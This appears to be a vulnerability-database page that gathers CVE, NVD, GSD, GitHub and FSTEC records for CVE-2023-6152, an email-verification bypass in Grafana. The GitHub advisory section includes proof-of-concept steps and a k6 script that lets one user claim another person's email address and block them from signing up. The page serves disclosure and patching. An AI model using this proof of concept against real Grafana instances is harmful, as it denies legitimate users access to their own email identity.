CVE-2023-6152 (GCVE-0-2023-6152)
Vulnerability from cvelistv5 – Published: 2024-02-13 21:38 – Updated: 2025-02-15 00:10
VLAI?
Summary
A user changing their email after signing up and verifying it can change it without verification in profile settings.
The configuration option "verify_email_enabled" will only validate email only on sign up.
Severity ?
5.4 (Medium)
CWE
Assigner
References
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Grafana | Grafana |
Affected:
2.5.0 , < 9.5.16
(semver)
Affected: 10.0.0 , < 10.0.11 (semver) Affected: 10.1.0 , < 10.1.7 (semver) Affected: 10.2.0 , < 10.2.4 (semver) Affected: 10.3.0 , < 10.3.3 (semver) |
|||||||
|
|||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-02-15T00:10:28.890Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"url": "https://security.netapp.com/advisory/ntap-20250214-0008/"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "grafana",
"vendor": "grafana",
"versions": [
{
"lessThan": "9.5.16",
"status": "affected",
"version": "2.5.0",
"versionType": "custom"
},
{
"lessThan": "10.0.11",
"status": "affected",
"version": "10.0.0",
"versionType": "custom"
},
{
"lessThan": "10.1.7",
"status": "affected",
"version": "10.10",
"versionType": "custom"
},
{
"lessThan": "10.2.4",
"status": "affected",
"version": "10.2.0",
"versionType": "custom"
},
{
"lessThan": "10.3.3",
"status": "affected",
"version": "10.3.0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:grafana:grafana_enterprise:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "grafana_enterprise",
"vendor": "grafana",
"versions": [
{
"lessThan": "9.5.16",
"status": "affected",
"version": "2.5.0",
"versionType": "custom"
},
{
"lessThan": "10.0.11",
"status": "affected",
"version": "10.0.0",
"versionType": "custom"
},
{
"lessThan": "10.1.7",
"status": "affected",
"version": "10.10",
"versionType": "custom"
},
{
"lessThan": "10.2.4",
"status": "affected",
"version": "10.2.0",
"versionType": "custom"
},
{
"lessThan": "10.3.3",
"status": "affected",
"version": "10.3.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-6152",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-22T15:42:45.786092Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-22T15:51:56.870Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Grafana",
"vendor": "Grafana",
"versions": [
{
"lessThan": "9.5.16",
"status": "affected",
"version": "2.5.0",
"versionType": "semver"
},
{
"lessThan": "10.0.11",
"status": "affected",
"version": "10.0.0",
"versionType": "semver"
},
{
"lessThan": "10.1.7",
"status": "affected",
"version": "10.1.0",
"versionType": "semver"
},
{
"lessThan": "10.2.4",
"status": "affected",
"version": "10.2.0",
"versionType": "semver"
},
{
"lessThan": "10.3.3",
"status": "affected",
"version": "10.3.0",
"versionType": "semver"
}
]
},
{
"product": "Grafana Enterprise",
"vendor": "Grafana",
"versions": [
{
"lessThan": "9.5.16",
"status": "affected",
"version": "2.5.0",
"versionType": "semver"
},
{
"lessThan": "10.0.11",
"status": "affected",
"version": "10.0.0",
"versionType": "semver"
},
{
"lessThan": "10.1.7",
"status": "affected",
"version": "10.1.0",
"versionType": "semver"
},
{
"lessThan": "10.2.4",
"status": "affected",
"version": "10.2.0",
"versionType": "semver"
},
{
"lessThan": "10.3.3",
"status": "affected",
"version": "10.3.0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eA user changing their email after signing up and verifying it can change it without verification in profile settings.\u003c/p\u003e\u003cp\u003eThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\u003c/p\u003e"
}
],
"value": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n"
}
],
"impacts": [
{
"capecId": "CAPEC-115",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-115"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-02-13T21:38:01.404Z",
"orgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"shortName": "GRAFANA"
},
"references": [
{
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"assignerShortName": "GRAFANA",
"cveId": "CVE-2023-6152",
"datePublished": "2024-02-13T21:38:01.404Z",
"dateReserved": "2023-11-15T12:44:28.824Z",
"dateUpdated": "2025-02-15T00:10:28.890Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://grafana.com/security/security-advisories/cve-2023-6152/\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://security.netapp.com/advisory/ntap-20250214-0008/\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2025-02-15T00:10:28.890Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-6152\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-22T15:42:45.786092Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\"], \"vendor\": \"grafana\", \"product\": \"grafana\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.5.0\", \"lessThan\": \"9.5.16\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"10.0.11\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.10\", \"lessThan\": \"10.1.7\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.2.0\", \"lessThan\": \"10.2.4\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.3.0\", \"lessThan\": \"10.3.3\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}, {\"cpes\": [\"cpe:2.3:a:grafana:grafana_enterprise:*:*:*:*:*:*:*:*\"], \"vendor\": \"grafana\", \"product\": \"grafana_enterprise\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.5.0\", \"lessThan\": \"9.5.16\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"10.0.11\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.10\", \"lessThan\": \"10.1.7\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.2.0\", \"lessThan\": \"10.2.4\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.3.0\", \"lessThan\": \"10.3.3\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-22T15:47:58.337Z\"}}], \"cna\": {\"impacts\": [{\"capecId\": \"CAPEC-115\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-115\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"Grafana\", \"product\": \"Grafana\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.5.0\", \"lessThan\": \"9.5.16\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"10.0.11\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.1.0\", \"lessThan\": \"10.1.7\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.2.0\", \"lessThan\": \"10.2.4\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.3.0\", \"lessThan\": \"10.3.3\", \"versionType\": \"semver\"}]}, {\"vendor\": \"Grafana\", \"product\": \"Grafana Enterprise\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.5.0\", \"lessThan\": \"9.5.16\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"10.0.11\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.1.0\", \"lessThan\": \"10.1.7\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.2.0\", \"lessThan\": \"10.2.4\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.3.0\", \"lessThan\": \"10.3.3\", \"versionType\": \"semver\"}]}], \"references\": [{\"url\": \"https://grafana.com/security/security-advisories/cve-2023-6152/\"}, {\"url\": \"https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"A user changing their email after signing up and verifying it can change it without verification in profile settings.\\n\\nThe configuration option \\\"verify_email_enabled\\\" will only validate email only on sign up.\\n\\n\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cp\u003eA user changing their email after signing up and verifying it can change it without verification in profile settings.\u003c/p\u003e\u003cp\u003eThe configuration option \\\"verify_email_enabled\\\" will only validate email only on sign up.\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-863\", \"description\": \"CWE-863\"}]}], \"providerMetadata\": {\"orgId\": \"57da9224-a3e2-4646-9d0e-c4dc2e05e7da\", \"shortName\": \"GRAFANA\", \"dateUpdated\": \"2024-02-13T21:38:01.404Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2023-6152\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-15T00:10:28.890Z\", \"dateReserved\": \"2023-11-15T12:44:28.824Z\", \"assignerOrgId\": \"57da9224-a3e2-4646-9d0e-c4dc2e05e7da\", \"datePublished\": \"2024-02-13T21:38:01.404Z\", \"assignerShortName\": \"GRAFANA\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GSD-2023-6152
Vulnerability from gsd - Updated: 2023-12-13 01:20Details
A user changing their email after signing up and verifying it can change it without verification in profile settings.
The configuration option "verify_email_enabled" will only validate email only on sign up.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2023-6152",
"id": "GSD-2023-6152"
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2023-6152"
],
"details": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n",
"id": "GSD-2023-6152",
"modified": "2023-12-13T01:20:32.774255Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security@grafana.com",
"ID": "CVE-2023-6152",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Grafana",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "2.5.0",
"version_value": "9.5.16"
},
{
"version_affected": "\u003c",
"version_name": "10.0.0",
"version_value": "10.0.11"
},
{
"version_affected": "\u003c",
"version_name": "10.1.0",
"version_value": "10.1.7"
},
{
"version_affected": "\u003c",
"version_name": "10.2.0",
"version_value": "10.2.4"
},
{
"version_affected": "\u003c",
"version_name": "10.3.0",
"version_value": "10.3.3"
}
]
}
},
{
"product_name": "Grafana Enterprise",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "2.5.0",
"version_value": "9.5.16"
},
{
"version_affected": "\u003c",
"version_name": "10.0.0",
"version_value": "10.0.11"
},
{
"version_affected": "\u003c",
"version_name": "10.1.0",
"version_value": "10.1.7"
},
{
"version_affected": "\u003c",
"version_name": "10.2.0",
"version_value": "10.2.4"
},
{
"version_affected": "\u003c",
"version_name": "10.3.0",
"version_value": "10.3.3"
}
]
}
}
]
},
"vendor_name": "Grafana"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n"
}
]
},
"impact": {
"cvss": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-863",
"lang": "eng",
"value": "CWE-863"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://grafana.com/security/security-advisories/cve-2023-6152/",
"refsource": "MISC",
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"name": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f",
"refsource": "MISC",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
}
]
}
},
"nvd.nist.gov": {
"cve": {
"descriptions": [
{
"lang": "en",
"value": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n"
}
],
"id": "CVE-2023-6152",
"lastModified": "2024-02-14T13:59:35.580",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5,
"source": "security@grafana.com",
"type": "Secondary"
}
]
},
"published": "2024-02-13T22:15:45.430",
"references": [
{
"source": "security@grafana.com",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"source": "security@grafana.com",
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
}
],
"sourceIdentifier": "security@grafana.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "security@grafana.com",
"type": "Secondary"
}
]
}
}
}
}
GHSA-3HV4-R2FM-H27F
Vulnerability from github – Published: 2024-02-13 22:25 – Updated: 2025-02-18 22:29
VLAI?
Summary
Email Validation Bypass And Preventing Sign Up From Email's Owner
Details
Summary
Email validation can easily be bypassed because verify_email_enabled option enable email validation at sign up only.
A user changing it's email after signing up (and verifying it) can change it without verification in /profile.
This can be used to prevent legitimate owner of the email address from signing up.
Another way to prevent email's owner from signing up is by setting Username as an email: When a new user is registrering, they can set two different email addresses in the Email and Username field, technically having 2 email addresses (because Grafana handles usernames and emails the same in some situations), but only the former is validated.
Here user a prevents owner of bar@example.com to signup.
Details
I don't know exact location but this is related to PUT /api/user handler.
PoC
Bypass email validation: * Start a new grafana instance using latest version * Sign up with email foo@example. * Login to that account. * Go to profile and change email to bar@example.com * That's it, your using an email you don't own.
Prevent email's owner from signing up: * Start a new grafana instance using latest version * Sign up with email foo@example. * Login to that account. * Go to profile and change username (not email) to bar@example.com * Signout. * Try to sign up with email b@example.com * Warning popup "User with same email address already exists"
K6 script (with verify_email_enabled set to false):
import { check, group } from "k6"
import http from "k6/http"
export const options = {
scenarios: {
perVuIter: {
executor: 'per-vu-iterations',
vus: 1,
iterations: 1
}
}
}
const GRAFANA_URL = __ENV.GRAFANA_URL || "http://localhost:3000"
export default function () {
group("create user_a with email foo@example.com", () => {
const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({
"email": "foo@example.com",
"password": "password"
}), {
headers: {
'Content-Type': "application/json"
}
})
check(response, {
'status code is 200': (r) => r.status == 200
})
})
group("change user_a login to bar@example.com", () => {
const response = http.put(`${GRAFANA_URL}/api/user`, JSON.stringify({
"email": "foo@example.com",
"login": "bar@example.com", // user_b email.
}), {
headers: {
'Content-Type': "application/json"
}
})
check(response, {
'status code is 200': (r) => r.status == 200
})
})
http.cookieJar().clear(GRAFANA_URL)
group("create user_b with email bar@example.com", () => {
const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({
"email": "bar@example.com",
"username": "bar@example.com",
"password": "password"
}), {
headers: {
'Content-Type': "application/json"
}
})
check(response, {
'status code is 200': (r) => r.status == 200 // fail
})
})
}
Impact
Bypass email verification. Prevent legitimate owner from signing up.
Severity ?
5.4 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "2.5.0"
},
{
"fixed": "9.5.16"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"fixed": "10.0.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.1.0"
},
{
"fixed": "10.1.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.2.0"
},
{
"fixed": "10.2.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.3.0"
},
{
"fixed": "10.3.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-6152"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2024-02-13T22:25:10Z",
"nvd_published_at": "2024-02-13T22:15:45Z",
"severity": "MODERATE"
},
"details": "### Summary\nEmail validation can easily be bypassed because `verify_email_enabled` option enable email validation at sign up only.\nA user changing it\u0027s email after signing up (and verifying it) can change it without verification in `/profile`.\nThis can be used to prevent legitimate owner of the email address from signing up.\n\nAnother way to prevent email\u0027s owner from signing up is by setting Username as an email:\nWhen a new user is registrering, they can set two different email addresses in the Email and Username field, technically having 2 email addresses (because Grafana handles usernames and emails the same in some situations), but only the former is validated.\n\n\n\nHere user a prevents owner of bar@example.com to signup.\n\n### Details\nI don\u0027t know exact location but this is related to PUT /api/user handler.\n\n### PoC\nBypass email validation:\n* Start a new grafana instance using latest version\n* Sign up with email foo@example.\n* Login to that account.\n* Go to profile and change email to bar@example.com\n* That\u0027s it, your using an email you don\u0027t own.\n\nPrevent email\u0027s owner from signing up:\n* Start a new grafana instance using latest version\n* Sign up with email foo@example.\n* Login to that account.\n* Go to profile and change username (not email) to [bar@example.com](mailto:bar@example.com)\n* Signout.\n* Try to sign up with email [b@example.com](mailto:b@example.com)\n* Warning popup \"User with same email address already exists\"\n\nK6 script (with `verify_email_enabled` set to `false`):\n```js\nimport { check, group } from \"k6\"\nimport http from \"k6/http\"\n\nexport const options = {\n scenarios: {\n perVuIter: {\n executor: \u0027per-vu-iterations\u0027,\n vus: 1,\n iterations: 1\n }\n }\n}\n\nconst GRAFANA_URL = __ENV.GRAFANA_URL || \"http://localhost:3000\"\n\nexport default function () {\n group(\"create user_a with email foo@example.com\", () =\u003e {\n const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({\n \"email\": \"foo@example.com\",\n \"password\": \"password\"\n }), {\n headers: {\n \u0027Content-Type\u0027: \"application/json\"\n }\n })\n\n check(response, {\n \u0027status code is 200\u0027: (r) =\u003e r.status == 200\n })\n })\n\n group(\"change user_a login to bar@example.com\", () =\u003e {\n const response = http.put(`${GRAFANA_URL}/api/user`, JSON.stringify({\n \"email\": \"foo@example.com\",\n \"login\": \"bar@example.com\", // user_b email.\n }), {\n headers: {\n \u0027Content-Type\u0027: \"application/json\"\n }\n })\n\n check(response, {\n \u0027status code is 200\u0027: (r) =\u003e r.status == 200\n })\n })\n\n http.cookieJar().clear(GRAFANA_URL)\n\n group(\"create user_b with email bar@example.com\", () =\u003e {\n const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({\n \"email\": \"bar@example.com\",\n \"username\": \"bar@example.com\",\n \"password\": \"password\"\n }), {\n headers: {\n \u0027Content-Type\u0027: \"application/json\"\n }\n })\n\n check(response, {\n \u0027status code is 200\u0027: (r) =\u003e r.status == 200 // fail\n })\n })\n}\n```\n\n### Impact\nBypass email verification.\nPrevent legitimate owner from signing up.",
"id": "GHSA-3hv4-r2fm-h27f",
"modified": "2025-02-18T22:29:35Z",
"published": "2024-02-13T22:25:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6152"
},
{
"type": "PACKAGE",
"url": "https://github.com/grafana/grafana"
},
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2023-6152"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250214-0008"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Email Validation Bypass And Preventing Sign Up From Email\u0027s Owner"
}
CVE-2023-6152
Vulnerability from fstec - Published: 10.11.2023
VLAI Severity ?
Title
Уязвимость базовой системы аутентификации веб-инструмента представления данных Grafana, позволяющая нарушителю обойти проверку электронной почты и помешать законным владельцам электронной почты зарегистрироваться
Description
Уязвимость базовой системы аутентификации веб-инструмента представления данных Grafana связана с недостатками механизма авторизации при обработке параметра verify_email_enabled. Эксплуатация уязвимости может позволить нарушителю, действующему удалённо, обойти проверку электронной почты и помешать законным владельцам электронной почты зарегистрироваться
Severity ?
Vendor
ООО «Ред Софт», Grafana Labs
Software Name
РЕД ОС (запись в едином реестре российских программ №3751), Grafana
Software Version
7.3 (РЕД ОС), до 9.5.16 (Grafana), от 10.0.0 до 10.0.11 (Grafana), от 10.1.0 до 10.1.7 (Grafana), от 10.2.0 до 10.2.4 (Grafana), от 10.3.0 до 10.3.3 (Grafana)
Possible Mitigations
Использование рекомендаций:
Для Grafana:
https://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/
Для РедОС: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/
Reference
https://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/
https://grafana.com/security/security-advisories/cve-2023-6152/
https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f
http://repo.red-soft.ru/redos/7.3c/x86_64/updates/
CWE
CWE-863
{
"CVSS 2.0": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"CVSS 3.0": "AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"CVSS 4.0": null,
"remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
"remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
"\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb, Grafana Labs",
"\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "7.3 (\u0420\u0415\u0414 \u041e\u0421), \u0434\u043e 9.5.16 (Grafana), \u043e\u0442 10.0.0 \u0434\u043e 10.0.11 (Grafana), \u043e\u0442 10.1.0 \u0434\u043e 10.1.7 (Grafana), \u043e\u0442 10.2.0 \u0434\u043e 10.2.4 (Grafana), \u043e\u0442 10.3.0 \u0434\u043e 10.3.3 (Grafana)",
"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\n\u0414\u043b\u044f Grafana:\nhttps://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/\n\n\u0414\u043b\u044f \u0420\u0435\u0434\u041e\u0421: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/",
"\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "10.11.2023",
"\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "22.04.2024",
"\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "10.04.2024",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2024-02816",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2023-6152",
"\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
"\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
"\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "\u0420\u0415\u0414 \u041e\u0421 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751), Grafana",
